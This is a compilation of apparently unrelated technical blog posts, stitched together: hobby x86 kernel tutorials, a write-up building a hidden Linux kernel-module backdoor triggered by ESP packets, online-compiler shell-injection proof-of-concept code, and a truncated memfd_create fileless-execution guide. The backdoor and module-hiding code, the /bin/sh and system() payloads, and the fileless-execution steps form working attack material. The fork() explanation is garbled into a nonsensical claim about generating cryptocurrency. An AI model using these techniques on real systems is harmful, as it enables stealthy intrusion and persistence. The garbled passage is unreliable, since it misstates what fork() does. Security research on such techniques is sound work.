	/* Lowest bit of status will be set if buffer is not empty */
	if (status & 0x01) {
		keycode = read_port(KEYBOARD_DATA_PORT);
		if(keycode < 0)
			return;
		vidptr[current_loc++] = keyboard_map[keycode];
		vidptr[current_loc++] = 0x07;	
	}
}

We first signal EOI (End Of Interrput acknowlegment) by writing it to the PIC’s command port. Only after this; will the PIC allow further interrupt requests. We have to read 2 ports here — the data port 0x60 and the command/status port 0x64.

We first read port 0x64 to get the status. If the lowest bit of the status is 0, it means the buffer is empty and there is no data to read. In other cases, we can read the data port 0x60. This port will give us a keycode of the key pressed. Each keycode corresponds to each key on the keyboard. We use a simple character array defined in the file keyboard_map.h to map the keycode to the corresponding character. This character is then printed on to the screen using the same technique we used in the previous article.

In this article for the sake of brevity, I am only handling lowercase a-z and digits 0-9. You can with ease extend this to include special characters, ALT, SHIFT, CAPS LOCK. You can get to know if the key was pressed or released from the status port output and perform desired action. You can also map any combination of keys to special functions such as shutdown etc.

You can build the kernel, run it on a real machine or an emulator (QEMU) exactly the same way as in the earlier article (its repo).

Start typing !!

kernel running with keyboard support

 

References and Thanks

  1. 1. wiki.osdev.org
  2. 2. osdever.net

 

 

Let’s write a Kernel

origin text

Let us write a simple kernel which could be loaded with the GRUB bootloader on an x86 system. This kernel will display a message on the screen and then hang.

How does an x86 machine boot

Before we think about writing a kernel, let’s see how the machine boots up and transfers control to the kernel:

Most registers of the x86 CPU have well defined values after power-on. The Instruction Pointer (EIP) register holds the memory address for the instruction being executed by the processor. EIP is hardcoded to the value 0xFFFFFFF0. Thus, the x86 CPU is hardwired to begin execution at the physical address 0xFFFFFFF0. It is in fact, the last 16 bytes of the 32-bit address space. This memory address is called reset vector.

Now, the chipset’s memory map makes sure that 0xFFFFFFF0 is mapped to a certain part of the BIOS, not to the RAM. Meanwhile, the BIOS copies itself to the RAM for faster access. This is called shadowing. The address 0xFFFFFFF0 will contain just a jump instruction to the address in memory where BIOS has copied itself.

Thus, the BIOS code starts its execution.  BIOS first searches for a bootable device in the configured boot device order. It checks for a certain magic number to determine if the device is bootable or not. (whether bytes 511 and 512 of first sector are 0xAA55)

Once the BIOS has found a bootable device, it copies the contents of the device’s first sector into RAM starting from physical address 0x7c00; and then jumps into the address and executes the code just loaded. This code is called the bootloader.

The bootloader then loads the kernel at the physical address 0x100000. The address 0x100000 is used as the start-address for all big kernels on x86 machines.

All x86 processors begin in a simplistic 16-bit mode called real mode. The GRUB bootloader makes the switch to 32-bit protected mode by setting the lowest bit of CR0 register to 1. Thus the kernel loads in 32-bit protected mode.

Do note that in case of linux kernel, GRUB detects linux boot protocol and loads linux kernel in real mode. Linux kernel itself makes the switch to protected mode.

 

What all do we need?

* An x86 computer (of course)
* Linux
NASM assembler
* gcc
* ld (GNU Linker)
* grub

 

Source Code

Source code is available at my Github repository — mkernel

 

The entry point using assembly

We like to write everything in C, but we cannot avoid a little bit of assembly. We will write a small file in x86 assembly-language that serves as the starting point for our kernel. All our assembly file will do is invoke an external function which we will write in C, and then halt the program flow.

How do we make sure that this assembly code will serve as the starting point of the kernel?

We will use a linker script that links the object files to produce the final kernel executable. (more explained later)  In this linker script, we will explicitly specify that we want our binary to be loaded at the address 0x100000. This address, as I have said earlier, is where the kernel is expected to be. Thus, the bootloader will take care of firing the kernel’s entry point.

Here’s the assembly code:

;;kernel.asm
bits 32			;nasm directive - 32 bit
section .text

global start
extern kmain	        ;kmain is defined in the c file

start:
  cli 			;block interrupts
  mov esp, stack_space	;set stack pointer
  call kmain
  hlt		 	;halt the CPU

section .bss
resb 8192		;8KB for stack
stack_space:

The first instruction bits 32 is not an x86 assembly instruction. It’s a directive to the NASM assembler that specifies it should generate code to run on a processor operating in 32 bit mode. It is not mandatorily required in our example, however is included here as it’s good practice to be explicit.

The second line begins the text section (aka code section). This is where we put all our code.

global is another NASM directive to set symbols from source code as global. By doing so, the linker knows where the symbol start is; which happens to be our entry point.

kmain is our function that will be defined in our kernel.c file. extern declares that the function is declared elsewhere.

Then, we have the start function, which calls the kmain function and halts the CPU using the hlt instruction. Interrupts can awake the CPU from an hltinstruction. So we disable interrupts beforehand using cli instruction. cli is short for clear-interrupts.

We should ideally set aside some memory for the stack and point the stack pointer (esp) to it. However, it seems like GRUB does this for us and the stack pointer is already set at this point. But, just to be sure, we will allocate some space in the BSS section and point the stack pointer to the beginning of the allocated memory. We use the resb instruction which reserves memory given in bytes. After it, a label is left which will point to the edge of the reserved piece of memory. Just before the kmain is called, the stack pointer (esp) is made to point to this space using the mov instruction.

 

The kernel in C

In kernel.asm, we made a call to the function kmain(). So our C code will start executing at kmain():

/*
*  kernel.c
*/
void kmain(void)
{
	const char *str = "my first kernel";
	char *vidptr = (char*)0xb8000; 	//video mem begins here.
	unsigned int i = 0;
	unsigned int j = 0;

	/* this loops clears the screen
	* there are 25 lines each of 80 columns; each element takes 2 bytes */
	while(j < 80 * 25 * 2) {
		/* blank character */
		vidptr[j] = ' ';
		/* attribute-byte - light grey on black screen */
		vidptr[j+1] = 0x07; 		
		j = j + 2;
	}

	j = 0;

	/* this loop writes the string to video memory */
	while(str[j] != '\0') {
		/* the character's ascii */
		vidptr[i] = str[j];
		/* attribute-byte: give character black bg and light grey fg */
		vidptr[i+1] = 0x07;
		++j;
		i = i + 2;
	}
	return;
}

All our kernel will do is clear the screen and write to it the string “my first kernel”.

First we make a pointer vidptr that points to the address 0xb8000. This address is the start of video memory in protected mode. The screen’s text memory is simply a chunk of memory in our address space. The memory mapped input/output for the screen starts at 0xb8000 and supports 25 lines, each line contain 80 ascii characters.

Each character element in this text memory is represented by 16 bits (2 bytes), rather than 8 bits (1 byte) which we are used to.  The first byte should have the representation of the character as in ASCII. The second byte is the attribute-byte. This describes the formatting of the character including attributes such as color.

To print the character s in green color on black background, we will store the character s in the first byte of the video memory address and the value 0x02 in the second byte.
0 represents black background and 2 represents green foreground.

Have a look at table below for different colors:

0 - Black, 1 - Blue, 2 - Green, 3 - Cyan, 4 - Red, 5 - Magenta, 6 - Brown, 7 - Light Grey, 8 - Dark Grey, 9 - Light Blue, 10/a - Light Green, 11/b - Light Cyan, 12/c - Light Red, 13/d - Light Magenta, 14/e - Light Brown, 15/f – White.

 

In our kernel, we will use light grey character on a black background. So our attribute-byte must have the value 0x07.

In the first while loop, the program writes the blank character with 0x07 attribute all over the 80 columns of the 25 lines. This thus clears the screen.

In the second while loop, characters of the null terminated string “my first kernel” are written to the chunk of video memory with each character holding an attribute-byte of 0x07.

This should display the string on the screen.

 

The linking part

We will assemble kernel.asm with NASM to an object file; and then using GCC we will compile kernel.c to another object file. Now, our job is to get these objects linked to an executable bootable kernel.

For that, we use an explicit linker script, which can be passed as an argument to ld (our linker).

/*
*  link.ld
*/
OUTPUT_FORMAT(elf32-i386)
ENTRY(start)
SECTIONS
 {
   . = 0x100000;
   .text : { *(.text) }
   .data : { *(.data) }
   .bss  : { *(.bss)  }
 }

First, we set the output format of our output executable to be 32 bit Executable and Linkable Format (ELF). ELF is the standard binary file format for Unix-like systems on x86 architecture.

ENTRY takes one argument. It specifies the symbol name that should be the entry point of our executable.

SECTIONS is the most important part for us. Here, we define the layout of our executable. We could specify how the different sections are to be merged and at what location each of these is to be placed.

Within the braces that follow the SECTIONS statement, the period character (.) represents the location counter.
The location counter is always initialized to 0x0 at beginning of the SECTIONS block. It can be modified by assigning a new value to it.

Remember, earlier I told you that kernel’s code should start at the address 0x100000. So, we set the location counter to 0x100000.

Have look at the next line .text : { *(.text) }

The asterisk (*) is a wildcard character that matches any file name. The expression *(.text) thus means all .text input sections from all input files.

So, the linker merges all text sections of the object files to the executable’s text section, at the address stored in the location counter. Thus, the code section of our executable begins at 0x100000.

After the linker places the text output section, the value of the location counter will become
0x1000000 + the size of the text output section.

Similarly, the data and bss sections are merged and placed at the then values of location-counter.

 

Grub and Multiboot

Now, we have all our files ready to build the kernel. But, since we like to boot our kernel with the GRUB bootloader, there is one step left.

There is a standard for loading various x86 kernels using a boot loader; called as Multiboot specification.

GRUB will only load our kernel if it complies with the Multiboot spec.

According to the spec, the kernel must contain a header (known as Multiboot header) within its first 8 KiloBytes.

Further, This Multiboot header must contain 3 fields that are 4 byte aligned namely:

  • magic field: containing the magic number 0x1BADB002, to identify the header.
  • flags field: We will not care about this field. We will simply set it to zero.
  • checksum field: the checksum field when added to the fields ‘magic’ and ‘flags’ must give zero.

So our kernel.asm will become:

;;kernel.asm

;nasm directive - 32 bit
bits 32
section .text
        ;multiboot spec
        align 4
        dd 0x1BADB002            ;magic
        dd 0x00                  ;flags
        dd - (0x1BADB002 + 0x00) ;checksum. m+f+c should be zero

global start
extern kmain	        ;kmain is defined in the c file

start:
  cli 			;block interrupts
  mov esp, stack_space	;set stack pointer
  call kmain
  hlt		 	;halt the CPU

section .bss
resb 8192		;8KB for stack
stack_space:

The dd defines a double word of size 4 bytes.

Building the kernel

We will now create object files from kernel.asm and kernel.c and then link it using our linker script.

nasm -f elf32 kernel.asm -o kasm.o

will run the assembler to create the object file kasm.o in ELF-32 bit format.

gcc -m32 -c kernel.c -o kc.o

The ’-c ’ option makes sure that after compiling, linking doesn’t implicitly happen.

ld -m elf_i386 -T link.ld -o kernel kasm.o kc.o

will run the linker with our linker script and generate the executable named kernel.

 

Configure your grub and run your kernel

GRUB requires your kernel to be of the name pattern kernel-<version>. So, rename the kernel. I renamed my kernel executable to kernel-701.

Now place it in the /boot directory. You will require superuser privileges to do so.

In your GRUB configuration file grub.cfg you should add an entry, something like:

title myKernel
	root (hd0,0)
	kernel /boot/kernel-701 ro

 

Don’t forget to remove the directive hiddenmenu if it exists.

Reboot your computer, and you’ll get a list selection with the name of your kernel listed.

Select it and you should see:

image

That’s your kernel!!

 

PS:

* It’s always advisable to get yourself a virtual machine for all kinds of kernel hacking. * To run this on grub2 which is the default bootloader for newer distros, your config should look like this:

menuentry 'kernel 701' {
	set root='hd0,msdos1'
	multiboot /boot/kernel-701 ro
}

 

* Also, if you want to run the kernel on the qemu emulator instead of booting with GRUB, you can do so by:

qemu-system-i386 -kernel kernel

Misusing debugfs for In-Memory RCE

An explanation of how debugfs and nf hooks can be used to remotely execute code.

Картинки по запросу debugfs

Introduction

Debugfs is a simple-to-use RAM-based file system specially designed for kernel debugging purposes. It was released with version 2.6.10-rc3 and written by Greg Kroah-Hartman. In this post, I will be showing you how to use debugfs and Netfilter hooks to create a Loadable Kernel Module capable of executing code remotely entirely in RAM.

An attacker’s ideal process would be to first gain unprivileged access to the target, perform a local privilege escalation to gain root access, insert the kernel module onto the machine as a method of persistence, and then pivot to the next target.

Note: The following is tested and working on clean images of Ubuntu 12.04 (3.13.0-32), Ubuntu 14.04 (4.4.0-31), Ubuntu 16.04 (4.13.0-36). All development was done on Arch throughout a few of the most recent kernel versions (4.16+).

Practicality of a debugfs RCE

When diving into how practical using debugfs is, I needed to see how prevalent it was across a variety of systems.

For every Ubuntu release from 6.06 to 18.04 and CentOS versions 6 and 7, I created a VM and checked the three statements below. This chart details the answers to each of the questions for each distro. The main thing I was looking for was to see if it was even possible to mount the device in the first place. If that was not possible, then we won’t be able to use debugfs in our backdoor.

Fortunately, every distro, except Ubuntu 6.06, was able to mount debugfs. Every Ubuntu version from 10.04 and on as well as CentOS 7 had it mounted by default.

  1. Present: Is /sys/kernel/debug/ present on first load?
  2. Mounted: Is /sys/kernel/debug/ mounted on first load?
  3. Possible: Can debugfs be mounted with sudo mount -t debugfs none /sys/kernel/debug?
Operating System Present Mounted Possible
Ubuntu 6.06 No No No
Ubuntu 8.04 Yes No Yes
Ubuntu 10.04* Yes Yes Yes
Ubuntu 12.04 Yes Yes Yes
Ubuntu 14.04** Yes Yes Yes
Ubuntu 16.04 Yes Yes Yes
Ubuntu 18.04 Yes Yes Yes
Centos 6.9 Yes No Yes
Centos 7 Yes Yes Yes
  • *debugfs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs
  • **tracefs also mounted on the server version as rw,relatime on /var/lib/ureadahead/debugfs/tracing

Executing code on debugfs

Once I determined that debugfs is prevalent, I wrote a simple proof of concept to see if you can execute files from it. It is a filesystem after all.

The debugfs API is actually extremely simple. The main functions you would want to use are: debugfs_initialized — check if debugfs is registered, debugfs_create_blob — create a file for a binary object of arbitrary size, and debugfs_remove — delete the debugfs file.

In the proof of concept, I didn’t use debugfs_initialized because I know that it’s present, but it is a good sanity-check.

To create the file, I used debugfs_create_blob as opposed to debugfs_create_file as my initial goal was to execute ELF binaries. Unfortunately I wasn’t able to get that to work — more on that later. All you have to do to create a file is assign the blob pointer to a buffer that holds your content and give it a length. It’s easier to think of this as an abstraction to writing your own file operations like you would do if you were designing a character device.

The following code should be very self-explanatory. dfs holds the file entry and myblob holds the file contents (pointer to the buffer holding the program and buffer length). I simply call the debugfs_create_blob function after the setup with the name of the file, the mode of the file (permissions), NULL parent, and lastly the data.

struct dentry *dfs = NULL;
struct debugfs_blob_wrapper *myblob = NULL;

int create_file(void){
	unsigned char *buffer = "\
#!/usr/bin/env python\n\
with open(\"/tmp/i_am_groot\", \"w+\") as f:\n\
	f.write(\"Hello, world!\")";

	myblob = kmalloc(sizeof *myblob, GFP_KERNEL);
	if (!myblob){
		return -ENOMEM;
	}

	myblob->data = (void *) buffer;
	myblob->size = (unsigned long) strlen(buffer);

	dfs = debugfs_create_blob("debug_exec", 0777, NULL, myblob);
	if (!dfs){
		kfree(myblob);
		return -EINVAL;
	}
	return 0;
}

Deleting a file in debugfs is as simple as it can get. One call to debugfs_remove and the file is gone. Wrapping an error check around it just to be sure and it’s 3 lines.

void destroy_file(void){
	if (dfs){
		debugfs_remove(dfs);
	}
}

Finally, we get to actually executing the file we created. The standard and as far as I know only way to execute files from kernel-space to user-space is through a function called call_usermodehelper. M. Tim Jones wrote an excellent article on using UMH called Invoking user-space applications from the kernel, so if you want to learn more about it, I highly recommend reading that article.

To use call_usermodehelper we set up our argv and envp arrays and then call the function. The last flag determines how the kernel should continue after executing the function (“Should I wait or should I move on?”). For the unfamiliar, the envp array holds the environment variables of a process. The file we created above and now want to execute is /sys/kernel/debug/debug_exec. We can do this with the code below.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

	call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

I would now recommend you try the PoC code to get a good feel for what is being done in terms of actually executing our program. To check if it worked, run ls /tmp/ and see if the file i_am_groot is present.

Netfilter

We now know how our program gets executed in memory, but how do we send the code and get the kernel to run it remotely? The answer is by using Netfilter! Netfilter is a framework in the Linux kernel that allows kernel modules to register callback functions called hooks in the kernel’s networking stack.

If all that sounds too complicated, think of a Netfilter hook as a bouncer of a club. The bouncer is only allowed to let club-goers wearing green badges to go through (ACCEPT), but kicks out anyone wearing red badges (DENY/DROP). He also has the option to change anyone’s badge color if he chooses. Suppose someone is wearing a red badge, but the bouncer wants to let them in anyway. The bouncer can intercept this person at the door and alter their badge to be green. This is known as packet “mangling”.

For our case, we don’t need to mangle any packets, but for the reader this may be useful. With this concept, we are allowed to check any packets that are coming through to see if they qualify for our criteria. We call the packets that qualify “trigger packets” because they trigger some action in our code to occur.

Netfilter hooks are great because you don’t need to expose any ports on the host to get the information. If you want a more in-depth look at Netfilter you can read the article here or the Netfilter documentation.

netfilter hooks

When I use Netfilter, I will be intercepting packets in the earliest stage, pre-routing.

ESP Packets

The packet I chose to use for this is called ESP. ESP or Encapsulating Security Payload Packets were designed to provide a mix of security services to IPv4 and IPv6. It’s a fairly standard part of IPSec and the data it transmits is supposed to be encrypted. This means you can put an encrypted version of your script on the client and then send it to the server to decrypt and run.

Netfilter Code

Netfilter hooks are extremely easy to implement. The prototype for the hook is as follows:

unsigned int function_name (
		unsigned int hooknum,
		struct sk_buff *skb,
		const struct net_device *in,
		const struct net_device *out,
		int (*okfn)(struct sk_buff *)
);

All those arguments aren’t terribly important, so let’s move on to the one you need: struct sk_buff *skbsk_buffs get a little complicated so if you want to read more on them, you can find more information here.

To get the IP header of the packet, use the function skb_network_header and typecast it to a struct iphdr *.

struct iphdr *ip_header;

ip_header = (struct iphdr *)skb_network_header(skb);
if (!ip_header){
	return NF_ACCEPT;
}

Next we need to check if the protocol of the packet we received is an ESP packet or not. This can be done extremely easily now that we have the header.

if (ip_header->protocol == IPPROTO_ESP){
	// Packet is an ESP packet
}

ESP Packets contain two important values in their header. The two values are SPI and SEQ. SPI stands for Security Parameters Index and SEQ stands for Sequence. Both are technically arbitrary initially, but it is expected that the sequence number be incremented each packet. We can use these values to define which packets are our trigger packets. If a packet matches the correct SPI and SEQ values, we will perform our action.

if ((esp_header->spi == TARGET_SPI) &&
	(esp_header->seq_no == TARGET_SEQ)){
	// Trigger packet arrived
}

Once you’ve identified the target packet, you can extract the ESP data using the struct’s member enc_data. Ideally, this would be encrypted thus ensuring the privacy of the code you’re running on the target computer, but for the sake of simplicity in the PoC I left it out.

The tricky part is that Netfilter hooks are run in a softirq context which makes them very fast, but a little delicate. Being in a softirq context allows Netfilter to process incoming packets across multiple CPUs concurrently. They cannot go to sleep and deferred work runs in an interrupt context (this is very bad for us and it requires using delayed workqueues as seen in state.c).

The full code for this section can be found here.

Limitations

  1. Debugfs must be present in the kernel version of the target (>= 2.6.10-rc3).
  2. Debugfs must be mounted (this is trivial to fix if it is not).
  3. rculist.h must be present in the kernel (>= linux-2.6.27.62).
  4. Only interpreted scripts may be run.

Anything that contains an interpreter directive (python, ruby, perl, etc.) works together when calling call_usermodehelper on it. See this wikipedia article for more information on the interpreter directive.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/sys/kernel/debug/debug_exec",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Go also works, but it’s arguably not entirely in RAM as it has to make a temp file to build it and it also requires the .go file extension making this a little more obvious.

void execute_file(void){
	static char *envp[] = {
		"SHELL=/bin/bash",
		"HOME=/root/",
		"USER=root",
		"PATH=/usr/local/sbin:/usr/local/bin:"\
			"/usr/sbin:/usr/bin:/sbin:/bin",
		"DISPLAY=:0",
		"PWD=/", 
		NULL
	};

	char *argv[] = {
		"/usr/bin/go",
		"run",
		"/sys/kernel/debug/debug_exec.go",
		NULL
	};

    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

Discovery

If I were to add the ability to hide a kernel module (which can be done trivially through the following code), discovery would be very difficult. Long-running processes executing through this technique would be obvious as there would be a process with a high pid number, owned by root, and running <interpreter> /sys/kernel/debug/debug_exec. However, if there was no active execution, it leads me to believe that the only method of discovery would be a secondary kernel module that analyzes custom Netfilter hooks.

struct list_head *module;
int module_visible = 1;

void module_unhide(void){
	if (!module_visible){
		list_add(&(&__this_module)->list, module);
		module_visible++;
	}
}

void module_hide(void){
	if (module_visible){
		module = (&__this_module)->list.prev;
		list_del(&(&__this_module)->list);
		module_visible--;
	}
}

Mitigation

The simplest mitigation for this is to remount debugfs as noexec so that execution of files on it is prohibited. To my knowledge, there is no reason to have it mounted the way it is by default. However, this could be trivially bypassed. An example of execution no longer working after remounting with noexec can be found in the screenshot below.

For kernel modules in general, module signing should be required by default. Module signing involves cryptographically signing kernel modules during installation and then checking the signature upon loading it into the kernel. “This allows increased kernel security by disallowing the loading of unsigned modules or modules signed with an invalid key. Module signing increases security by making it harder to load a malicious module into the kernel.

debugfs with noexec

# Mounted without noexec (default)
cat /etc/mtab | grep "debugfs"
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko
sudo rm /tmp/i_am_groot
sudo umount /sys/kernel/debug
# Mounted with noexec
sudo mount -t debugfs none -o rw,noexec /sys/kernel/debug
ls -la /tmp/i_am_groot
sudo insmod test.ko
ls -la /tmp/i_am_groot
sudo rmmod test.ko

Future Research

An obvious area to expand on this would be finding a more standard way to load programs as well as a way to load ELF files. Also, developing a kernel module that can distinctly identify custom Netfilter hooks that were loaded in from kernel modules would be useful in defeating nearly every LKM rootkit that uses Netfilter hooks.

Take full control of online compilers through a common exploit

Online compilers are a handy tool to save time and resources for coders, and are freely available for a variety of programming languages. They are useful for learning a new language and developing simple programs, such as the ubiquitous “Hello World” exercise. I often use online compilers when I am out, so that I don’t have to worry about locating and downloading all of the resources myself.

Since these online tools are essentially remote compilers with a web interface, I realized that I might be able to take remote control of the machines through command injection. My research identified a common weakness in many compilers: inadequate sanitization of user-submitted code prior to execution. My analysis revealed that this lack of input filtration enables exploits that an hacker can use to take control of the machine or deliberately cause it to crash.

A clever attacker can exploit built-in C functions and POSIX libraries to gain control over the computer hosting the online compiler. Commands like execl()system(), and GetEnv() can be used to probe the target machine operating system and run any command on its built-in shell.

Vulnerability description


Gaining access

In several of the C/C++ compilers that I analyzed, the GetEnv(), system(), functions allow an attacker to study and execute any command on the remote machine. The GetEnv() function allows a hacker to learn information about the machine that is otherwise concealed from the web interface such as the username an OS version.

Once this information is revealed, the attacker can begin testing various exploits to achieve privilege escalation and gain access to a root shell. For example, the system() command can be used to execute malicious code and access sensitive data such as logs, website files, etc.

Since the exploit I discovered involves inserting hostile commands to gain control of an unwitting machine, this attack vector is classified as a “code injection” vulnerability.

 

Maintaining control

If hacker tries to run the online compiler every time they want to send a new command, the attack would leave an obvious trace, and the resource use might draw attention to the suspicious activity. These obstacles can be conveniently sidestepped by using the execl() function, which allows the user to specify any arbitrary program to replace the current process. An attacker can gain access to the machine’s built-in shell by invoking the execl() function to replace the current process with /bin/sh, with catastrophic implications.

Many compilers allow input from the browser, in which case the hacker can craft a program to relay input commands to the shell of the compromised machine. Once the hacker uses execl() to open a shell via browser, they can simply operate the remote machine using system() to inject various instructions. This avoids the need to run the compiler each time the attacker wishes to explore or exploit the compromised machine.

Implications


A hacker that obtains shell access in this way gains access to files and services typically protected from outside users. The attacker now has many options at their disposal for exploiting the machine and/or wreaking havoc; how they proceed will depend on their tools and motives.

If the attacker wishes to crash the target machine, they can achieve this by (mis)using the fork() function, which creates a new cryptocurrency and generates free money clone of the current process. A fork() function placed within a while (true) loop will execute indefinitely, repeatedly cloning the process to greedily consumed precious RAM memory. This rapid uncontrolled use of resources will overwhelm the machine, causing a self-DOS (denial of service attack).

Instead of maliciously crashing a machine, an attacker may wish to monetize their illicit access. This can be accomplished by injecting a cryptocurrency miner, which will generate funds for the attacker at the expense of the victim’s computational resources and electric bill. My analysis showed that this maneuver allows useful exploitation of online compilers that successfully stymied other attacks by sandboxing the environment or adopting more advanced techniques to limit file access.

Theory


This section documents the commands used to gain and maintain access to the online compiler. These functions require the unistd.h and stdlib.h libraries.

execl()
Declaration
int execl(const char *pathname, const char *arg, ...);
Parameters

pathname — char*, the name of the program

arg — char*, arguments passed to the program, specified by pathname

Description

The execl() function replaces the current process with a new process. This is the command exploited to maintain control over the remote machine without having to repeatedly use the online compiler. Reference the underlying execve() function for more details.

 

System()
Declaration
int system (const char* command);
Parameters

command — char* command name

Description

The C system function passes the command name, specified by command, to the host’s built-in shell (/bin/sh for UNIX-based systems) which executes it. This function is based on execl(), so system() will be called by executing:

execl(, "sh", "-c", command, (char *)0);
Return

This function returns the output of the command after it has been executed. If the shell encounters an error while executing the command, it will return the numeric value -1.

GetEnv()
Declaration
char *getenv(const char *name)
Parameters

name — const char* variable name.

Description

Retrieves a string containing the value of the environment variable whose name is specified as an argument ( name ).

Return

The function returns the contents of the requested environment variable as a string. If the requested variable is not part of the list of environments, the function returns a null pointer.

Proof of Concepts


#include "stdio.h"
#include "unistd.h"

int main(){
	 execl("/bin/sh",NULL,NULL); // Open the shell 
	 return 0;
}
#include "stdio.h"
#include "stdlib.h"

int main(){
	system("whoami"); // Find username 
	system("cd / && ls"); // Lists all files and directories on /
	return 0;
}

Solutions


Thankfully, most of the risks highlighted above can be mitigated relatively easily. Access to protected files and services can be prevented by creating a secure sandbox for the application. This minimizes the potential for collateral damage and inappropriate data access, but will not prevent some attacks such as cryptocurrency miner injection. In order to avoid these «mining» attacks, the sandbox should have limited resources and it should be able to reboot itself every 10 minutes.

To eliminate the underlying weakness, the libraries could be recompiled without the particular exploitable functions. An attacker cannot gain a foothold if the execl() and system() are removed or disabled by recompiling libraries.

Screenshots


 

In-Memory-Only ELF Execution (Without tmpfs)

In which we run a normal ELF binary on Linux without touching the filesystem (except /proc).

Introduction

Every so often, it’s handy to execute an ELF binary without touching disk. Normally, putting it somewhere under /run/user or something else backed by tmpfs works just fine, but, outside of disk forensics, that looks like a regular file operation. Wouldn’t it be cool to just grab a chunk of memory, put our binary in there, and run it without monkey-patching the kernel, rewriting execve(2) in userland, or loading a library into another process?

Enter memfd_create(2). This handy little system call is something like malloc(3), but instead of returning a pointer to a chunk of memory, it returns a file descriptor which refers to an anonymous (i.e. memory-only) file. This is only visible in the filesystem as a symlink in /proc/<PID>/fd/ (e.g. /proc/10766/fd/3), which, as it turns out, execve(2) will happily use to execute an ELF binary.

The manpage has the following to say on the subject of naming anonymous files:

The name supplied in name [an argument to memfd_create(2)] is used as a filename and will be displayed as the target of the corresponding symbolic link in the directory /proc/self/fd/. The displayed name is always prefixed with memfd: and serves only for debugging purposes. Names do not affect the behavior of the file descriptor, and as such multiple files can have the same name without any side effects.

In other words, we can give it a name (to which memfd: will be prepended), but what we call it doesn’t really do anything except help debugging (or forensicing). We can even give the anonymous file an empty name.

Listing /proc/<PID>/fd, anonymous files look like this:

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ ls -l /proc/10766/fd
total 0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 0 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 1 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 2 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 3 -> /memfd:kittens (deleted)
lrwx------ 1 stuart stuart 64 Mar 30 23:23 4 -> /memfd: (deleted)

Here we see two anonymous files, one named kittens and one without a name at all. The (deleted) is inaccurate and looks a bit weird but c’est la vie.

Caveats

Unless we land on target with some way to call memfd_create(2), from our initial vector (e.g. injection into a Perl or Python program with eval()), we’ll need a way to execute system calls on target. We could drop a binary to do this, but then we’ve failed to acheive fileless ELF execution. Fortunately, Perl’s syscall() solves this problem for us nicely.

We’ll also need a way to write an entire binary to the target’s memory as the contents of the anonymous file. For this, we’ll put it in the source of the script we’ll write to do the injection, but in practice pulling it down over the network is a viable alternative.

As for the binary itself, it has to be, well, a binary. Running scripts starting with #!/interpreter doesn’t seem to work.

The last thing we need is a sufficiently new kernel. Anything version 3.17 (released 05 October 2014) or later will work. We can find the target’s kernel version with uname -r.

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ uname -r
4.4.0-116-generic

On Target

Aside execve(2)ing an anonymous file instead of a regular filesystem file and doing it all in Perl, there isn’t much difference from starting any other program. Let’s have a look at the system calls we’ll use.

memfd_create(2)

Much like a memory-backed fd = open(name, O_CREAT|O_RDWR, 0700), we’ll use the memfd_create(2) system call to make our anonymous file. We’ll pass it the MFD_CLOEXEC flag (analogous to O_CLOEXEC), so that the file descriptor we get will be automatically closed when we execve(2) the ELF binary.

Because we’re using Perl’s syscall() to call the memfd_create(2), we don’t have easy access to a user-friendly libc wrapper function or, for that matter, a nice human-readable MFD_CLOEXEC constant. Instead, we’ll need to pass syscall() the raw system call number for memfd_create(2) and the numeric constant for MEMFD_CLOEXEC. Both of these are found in header files in /usr/include. System call numbers are stored in #defines starting with __NR_.

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:/usr/include$ egrep -r '__NR_memfd_create|MFD_CLOEXEC' *
asm-generic/unistd.h:#define __NR_memfd_create 279
asm-generic/unistd.h:__SYSCALL(__NR_memfd_create, sys_memfd_create)
linux/memfd.h:#define MFD_CLOEXEC               0x0001U
x86_64-linux-gnu/asm/unistd_64.h:#define __NR_memfd_create 319
x86_64-linux-gnu/asm/unistd_32.h:#define __NR_memfd_create 356
x86_64-linux-gnu/asm/unistd_x32.h:#define __NR_memfd_create (__X32_SYSCALL_BIT + 319)
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create

Looks like memfd_create(2) is system call number 319 on 64-bit Linux (#define __NR_memfd_create in a file with a name ending in _64.h), and MFD_CLOEXEC is a consatnt 0x0001U (i.e. 1, in linux/memfd.h). Now that we’ve got the numbers we need, we’re almost ready to do the Perl equivalent of C’s fd = memfd_create(name, MFD_CLOEXEC) (or more specifically, fd = syscall(319, name, MFD_CLOEXEC)).

The last thing we need is a name for our file. In a file listing, /memfd: is probably a bit better-looking than /memfd:kittens, so we’ll pass an empty string to memfd_create(2) via syscall(). Perl’s syscall() won’t take string literals (due to passing a pointer under the hood), so we make a variable with the empty string and use it instead.

Putting it together, let’s finally make our anonymous file:

my $name = "";
my $fd = syscall(319, $name, 1);
if (-1 == $fd) {
        die "memfd_create: $!";
}

We now have a file descriptor number in $fd. We can wrap that up in a Perl one-liner which lists its own file descriptors after making the anonymous file:

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ perl -e '$n="";die$!if-1==syscall(319,$n,1);print`ls -l /proc/$$/fd`'
total 0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 0 -> /dev/pts/0
